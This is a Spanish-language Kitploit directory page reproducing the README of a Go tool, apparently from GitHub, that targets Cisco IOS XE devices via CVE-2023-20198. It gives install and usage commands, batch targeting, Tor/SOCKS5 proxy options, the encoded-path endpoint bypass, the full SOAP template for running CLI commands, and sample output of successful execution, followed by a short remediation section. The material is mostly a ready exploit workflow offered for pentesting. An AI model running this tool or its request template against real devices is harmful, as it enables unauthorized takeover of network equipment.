Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cisco-cve-2023-20198-checker | Kitploit
Herramientas/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad de RedesPruebas de PenetraciónComando y Control
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 5 mesesAún no revisado

Comprobador de Cisco CVE-2023-20198

Go Version License Platform

Un escáner de vulnerabilidades profesional para detectar CVE-2023-20198 en dispositivos Cisco IOS XE. Prueba interfaces SOAP/XML vulnerables (WSMA). Diseñado para evaluaciones de seguridad autorizadas y auditoría de redes.

⚠️ Aviso Legal

SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS

Esta herramienta está destinada exclusivamente a:

  • Escaneo de vulnerabilidades autorizado
  • Auditorías de seguridad con consentimiento explícito por escrito
  • Evaluaciones de seguridad de redes
  • Fines educativos en entornos de laboratorio controlados
  • Pruebas de cumplimiento y penetración

El acceso no autorizado a sistemas informáticos es ILEGAL. Asegúrate siempre de tener la autorización adecuada antes de probar cualquier sistema.


🚀 Inicio Rápido

Instalación

Usando go install (Recomendado)

root@kitploit:~
go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

El binario se instalará en tu directorio $GOPATH/bin (normalmente ~/go/bin).

Instalación Manual

root@kitploit:~
# Clone repository
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Build
go build -o cisco-cve-2023-20198-checker

# Install (optional)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Uso Básico

root@kitploit:~
# Check single target
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Check multiple targets
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# Generate HTML report
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Características

  • ✅ Detección de vulnerabilidades - Prueba CVE-2023-20198 (RCE en WSMA)
  • ✅ Escaneo de objetivos individuales y por lotes
  • ✅ Soporte de puertos personalizados (por defecto: 443)
  • ✅ Ejecución de comandos vía SOAP/XML
  • ✅ Generación de informes HTML profesionales
  • ✅ Cero dependencias externas
  • ✅ Multiplataforma (Linux, macOS, Windows)
  • ✅ Opción para omitir certificados SSL/TLS
  • ✅ Tiempos de espera configurables
  • ✅ Soporte de proxy (HTTP, HTTPS, SOCKS5)
  • ✅ Proxies autenticados
  • ✅ Soporte de variables de entorno (HTTP_PROXY, HTTPS_PROXY)

🌐 Soporte de Proxy

¡Perfecto para entornos corporativos! Compatible con:

  • Proxies HTTP/HTTPS
  • Proxies SOCKS5 (túneles SSH, Tor)
  • Proxies autenticados
  • Variables de entorno
root@kitploit:~
# HTTP Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (SSH tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Environment variable
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Consulta PROXY_GUIDE.md para obtener una configuración detallada del proxy.


💻 Opciones de Línea de Comandos


📖 Ejemplos de Uso

Prueba de un Solo Objetivo

root@kitploit:~
# Basic vulnerability check
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Custom port
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Execute specific command
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Generate report
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Pruebas por Lotes

root@kitploit:~
# Create targets file
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Test all targets
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Batch with HTML report
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Comandos Avanzados

root@kitploit:~
# Network enumeration
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Version detection
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Through HTTP proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Through SOCKS5 proxy (SSH tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Authenticated proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 Acerca de CVE-2023-20198

Detalles de la Vulnerabilidad

CVE ID: CVE-2023-20198
Puntuación CVSS: 10.0 (Crítica)
Tipo: Ejecución Remota de Código (RCE)
Afecta: Interfaz Web de Cisco IOS XE (WSMA)

Detalles Técnicos

  • Endpoint: /%2577ebui_wsma_https (bypass de codificación de ruta)
  • Protocolo: SOAP 1.1 sobre HTTPS
  • Autenticación: WS-Security UsernameToken (se requieren credenciales válidas)
  • Namespace: urn:cisco:wsma-exec
  • Impacto: Compromiso total del dispositivo con credenciales válidas

Estructura de la Solicitud SOAP

root@kitploit:~
<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Remediación

Para Administradores de Sistemas

Si tus dispositivos son vulnerables:

1. Deshabilitar WSMA (si no es necesario)

root@kitploit:~
no ip http server
no ip http secure-server

2. Restringir el acceso con ACL

root@kitploit:~
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Actualizar el firmware - Aplicar los últimos parches de seguridad de Cisco

4. Habilitar autenticación sólida

root@kitploit:~
aaa new-model
aaa authentication login default group tacacs+ local

5. Supervisar los registros - Vigilar actividad sospechosa de SOAP/HTTP


🏗️ Compilación desde el Código Fuente

Requisitos Previos

  • Go 1.21 o superior

Compilar

root@kitploit:~
# Standard build
go build -o cisco-cve-2023-20198-checker

# Optimized (smaller binary)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# Cross-compile for different platforms
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 Ejemplos de Salida

Salida de Terminal

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     Cisco SOAP/XML Security Checker                       ║
║     Educational & Authorized Security Assessment Only     ║
╚═══════════════════════════════════════════════════════════╝

[*] Command: show version
[*] Port: 443
[*] Timeout: 10 seconds

[1/1] Testing target: 192.168.1.100:443
[*] Sending SOAP request...
[+] Response received (Status: 200)
[+] Success!

╔═══════════════════════════════════════════════════════════╗
║                    BATCH RESULTS                          ║
╚═══════════════════════════════════════════════════════════╝

[✓] 192.168.1.100:443 - SUCCESS
Cisco IOS XE Software, Version 16.09.04...

╔═══════════════════════════════════════════════════════════╗
║                      SUMMARY                              ║
╚═══════════════════════════════════════════════════════════╝
Total Targets: 1
Successful: 1
Failed: 0

Informe HTML

Informe profesional de evaluación de seguridad con:

  • Panel de estadísticas
  • Configuración detallada
  • Salidas de comandos (estilo terminal)
  • Metadatos técnicos
  • Avisos legales

🤝 Contribuciones

¡Las contribuciones son bienvenidas! Por favor:

  1. Haz un fork del repositorio
  2. Crea una rama de funcionalidad
  3. Realiza tus cambios
  4. Envía un pull request

📝 Licencia

Licencia MIT - consulta el archivo LICENSE


🔗 Referencias

  • Aviso de Seguridad de Cisco
  • Detalles de CVE-2023-20198
  • OWASP API Security

⚖️ Divulgación Responsable

Esta herramienta es únicamente para escaneo de vulnerabilidades autorizado. Los autores no son responsables de su uso indebido. Obtén siempre permiso por escrito antes de probar sistemas que no te pertenecen.


Hecho para la Comunidad de Seguridad 🛡️

Descargar herramienta
OpciónTipoPor defectoDescripción
-targetstring-IP/hostname de un único objetivo
-targets-filestring-Archivo con los objetivos (uno por línea)
-portint443Puerto HTTPS/SOAP
-usernamestringadminUsuario SOAP
-passwordstring-Requerido. Contraseña SOAP
-commandstringuname -aComando a ejecutar
-htmlboolfalseGenerar informe HTML
-timeoutint10Tiempo de espera de la solicitud (segundos)
-skip-verifybooltrueOmitir verificación SSL
-proxystring-URL del proxy (http://, https://, socks5://)